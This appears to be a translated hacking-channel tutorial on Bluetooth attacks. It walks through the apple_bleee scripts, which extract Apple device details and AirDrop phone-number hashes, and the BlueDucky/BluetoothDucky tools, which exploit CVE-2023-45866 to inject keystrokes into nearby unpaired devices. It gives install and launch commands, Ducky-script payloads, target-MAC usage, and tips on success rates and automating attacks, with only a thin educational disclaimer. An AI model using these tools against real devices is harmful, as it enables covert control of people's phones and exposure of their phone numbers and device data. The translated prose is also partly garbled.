Attacks on Bluetooth. Part 2. “Apple and blue duck”
Introduction
We are glad to welcome you again, dear reader! In this article we will continue to unwind topic of attacks on Bluetooth. In the last article we looked at the lightweight and the obvious type of attack is a stub. There is nothing complicated about these attacks.
But in this article my friend, we have prepared something for you more interesting. These attacks few people touched upon it, but perhaps we are mistaken, since we judge by our subjective opinionbut when searching for similar materials, the result was either very small or there was none at all.
Disclaimer: All data provided in the article is taken from open sources, does not call for action and is only data for information and study of the mechanisms of the technologies used.
Apple_bleee or jokes with apple
What is this?
These scripts demonstrate how an attacker can obtain sensitive information, such as unique identifiers for Apple devices, if they intercept Bluetooth traffic. They serve to illustrate potential vulnerabilities and can be used for educational purposes or for security testing.
Installation
To install we need to install a number of necessary components.
Installation yourself scripts
git clone https://github.com/hexway/apple_bleee.git
cd apple_bleeeInstallation components and modules
sudo apt update && sudo apt install -y bluez libpcap-dev libev-dev libnl-3-dev libnl-genl-3-dev libnl-route-3-dev cmake libbluetooth-dev
sudo pip3 install -r requirements.txtInstallation owl for AWDL interface
git clone https://github.com/seemoo-lab/owl.git && cd ./owl && git submodule update --init && mkdir build && cd build && cmake .. && make && sudo make install && cd ../..Or simply
apt install owlUsage
First, let's make sure that our Bluetooth adapter in active state team hcitool dev
Script ble_read_state.py listens to data transmission via BLE and displays information about the status of Apple devices. In addition, the program detects requests to exchange passwords with Apple devices. In these packages you can extract first three bytes of sha256 hash (phone_number) and try to guess original phone number using pre-prepared tables with number hash values.
To start monitoring, we use this script using the following command:
python3 ble_read_state.py
We can track the status of the device, see what specific device it is, whether it is connected to Wi-Fi, and the type and version of the operating system.
Let's move on to the next script airdrop_leak.py. This script allows get the mobile phone number of any user who is trying to send a file via AirDrop. This is exactly why we need the AWDL interface. Therefore, we transfer the adapter to monitoring mode and launch owl.
Without parameters, the script simply displays the phone hash and the sender's IPv6 address.
The adv_wifi.py script initiates BLE messaging to request WiFi password sharing. This demo shows that an attacker is capable of cause a pop-up message to appear on the target device if it knows the phone number or email address associated with the victim's device.
sudo python3 adv_wifi.py -e pr@hexway.io -s hexway
The adv_airpods.py script creates an imitation of AirPods by sending messages via the BLE protocol.**
sudo python3 adv_airpods.py -r
With this set of scripts you can come up with a lot of things, again it all depends on your imagination. In the same way, you can automate the use of these scripts on the same Raspberry Pi and come up with something more interesting.
BlueDucky or BluetoothDucky. Cheerful blue duck
What is this?
Now we move on to the most interesting tool of this article! But first, a little background.
The vulnerability with the identifier CVE-2023-45866 can be exploited without the use of specialized equipment. The attack is carried out from a computer running Linux using a standard Bluetooth adapter. Engineer Mark Newlin discovered this issue and reported it to Apple, Google, Canonical and the Bluetooth SIG. This attack allows an attacker located near the victim's computer to emulate keystrokes and perform malicious actions on devices that do not require a password or biometric authentication.
BlueDucky is a powerful tool for exploiting vulnerabilities in Bluetooth devices. By running this script, you will be able to:
Load saved Bluetooth devices that are no longer visible but Bluetooth is still turned on.
Automatically save all scanned devices.
Send messages in Ducky script format to interact with devices.
Installation
First you need to install all dependencies from apt.
sudo apt install -y bluez-tools bluez-hcidump libbluetooth-dev \
git gcc python3-pip python3-setuptools \
python3-pydbusFurther install pyluez.
git clone https://github.com/pybluez/pybluez.git
cd pybluez
sudo python3 setup.py installInstall bdaddr from the bluez repository.
cd ~/
git clone --depth=1 https://github.com/bluez/bluez.git
gcc -o bdaddr ~/bluez/tools/bdaddr.c ~/bluez/src/oui.c -I ~/bluez -lbluetooth
sudo cp bdaddr /usr/local/bin/Well, install and launch the instrument itself.
git clone https://github.com/pentestfunctions/BlueDucky.git
cd BlueDucky
sudo hciconfig hci0 up
python3 BlueDucky.pyUsage
Well, let's finally start the demonstration! Our tool already has it pre-prepared two payload scenarios. The first one transfers to the site, and the second one displays a message.
File payload_example_1.txt:
REM Opens a private browser to hackertyper.net
DELAY 200
ESCAPE
GUI d
ALT ESCAPE
GUI b
DELAY 700
REM PRIVATE_BROWSER is equal to CTRL + SHIFT + N
PRIVATE_BROWSER
DELAY 700
CTRL l
DELAY 300
STRING hackertyper.net
DELAY 300
ENTER
DELAY 300File payload_example_2.txt:
REM This is a comment and will not run
STRING lifehackLL
DELAY 200
GUI sScripts can work on smartphones not entirely correctbecause were originally written for PC devices. However, for example, the second script works well on smartphones. To carry out an attack, it is not necessary to pair with a device; it can be carried out just like that. However, according to our observations, the attack has a 1 in 3 chance of working. This means that the attack's success rate is about 33%. It is important to take this fact into account when planning and carrying out attacks on smartphones. You need to be prepared for possible failures and have a strategy for what to do if the script fails. However, the ability to conduct attacks without pairing a device opens up new prospects for security testing and vulnerability detection on mobile devices.
To start, we only need to register python3 BlueDucky.py. By default, the tool uses the hci0 adapter, but if you need to use a third-party adapter, for example hci1, then set the flag --adapter hci1.
But before that, you need to scan the devices to obtain the MAC address with the command hcitool scan.
Next, we run our script, specify the MAC of the device we are interested in and select the payload, we will select the second one.
Well, now we’re watching the result, let’s say we were corresponding with someone on Telegram, and then they connected to us, entered some text even without a pop-up keyboard, and later the messages application opened.
Exists alternative scriptwhich we think works much more interesting. Its main advantage is that it can be automated if necessary. Installing this script absolutely identical to the previous installationbut it is called by its full name BluetoothDucky and has system of parameters at startup, which allows you to automate it. This script opens up new possibilities for working with Bluetooth devices and can be configured to perform various tasks. Automating the process of launching it makes using the script more efficient and convenient. Thanks to this script, the user can easily perform various actions with Bluetooth devices, optimizing their work and increasing the efficiency of exploiting the vulnerability.
git clone https://github.com/pentestfunctions/BluetoothDucky
cd BluetoothDuckyAmong the features of this version of the tool is scan modethough it works with errors, but it works.
This version also has your own payload, light and uncomplicated.
REM open a text field on the android device to test if it is working
DELAY 1000
STRING robot was here
DELAY 1000
Enter
DELAY 1000Again, you can safely make changes to this file and write your own actions.
The launch occurs as follows and, in principle, is quite clear and simple:
sudo python3 BluetoothDucky.py -i hci0 -t 00:00:00:00:00:00This tool also has such a cool feature that if the previous (in this article) version of this tool essentially operated the payload only once, then this version does it almost cyclically.
I think, as you already guessed, we would give our preference to the second script, since it is more practical and even more autonomous and, as we have already said, it can be automated, and the automation of any attacks in itself sounds very interesting, especially such as this attack.
Conclusion
In this article, we drew your attention to lesser-known Bluetooth attacks that can be widely used by attackers. One example is vulnerability ID CVE-2023-45866, which allows an attacker without specialized equipment to hack devices via Bluetooth. This means that even a regular computer with a Bluetooth adapter can be used to exploit the vulnerability. Therefore, it is important to be attentive to the security of Bluetooth connections, especially if your phone is constantly connected to headphones or speakers.
LHMedia in telegram:
Life-Hack – Hacker / Hacking
News channel
Channel with free video courses
Humor
